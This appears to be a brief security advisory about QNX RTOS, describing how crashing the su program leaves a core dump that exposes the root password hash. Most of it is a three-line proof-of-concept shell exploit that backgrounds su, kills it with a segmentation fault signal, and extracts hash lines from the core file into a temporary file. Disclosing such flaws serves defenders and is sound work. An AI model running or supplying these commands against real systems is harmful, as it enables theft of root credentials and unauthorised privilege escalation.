QNX RTOS su Password Hash Disclosure Vulnerability

QNX RTOS su Password Hash Disclosure Vulnerability

The following proof of concept was provided by badc0ded@badc0ded.com:

$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

The attacker has effectively obtained a copy of the root user's password hash.